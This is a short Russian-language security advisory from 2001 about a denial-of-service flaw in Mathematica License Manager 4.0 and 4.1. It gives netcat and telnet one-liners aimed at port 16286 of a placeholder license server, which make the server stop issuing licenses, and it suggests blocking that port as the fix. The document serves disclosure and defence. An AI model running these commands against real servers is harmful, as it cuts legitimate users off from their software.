Security Lab

DoS для Mathematica

Дата публикации:01.08.2001
Дата изменения:17.10.2006
Всего просмотров:1250
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Уязвимость защиты в Mathematica позволяет нападавшим заставлять программу прекращать обслуживать лицензии легетивным пользователям. Уязвимость позволяет нападавшим вызывать отказ в обслуживании(DoS).



Если сервер лицензии - licenseserver.example.com и nc - netcat, достаточно набрать:

cat /dev/null | nc licenseserver.example.com 16286

или

telnet licenseserver.example.com 16286

Кроме того, сервер не будет отвечать ни на какие другие просьбы о лицензиях. Для устранения нужно запретить все пакеты, адресованные 16286 порту.

Уязвимость работает в:

Mathematica License Manager version 4.0

Mathematica License Manager version 4.1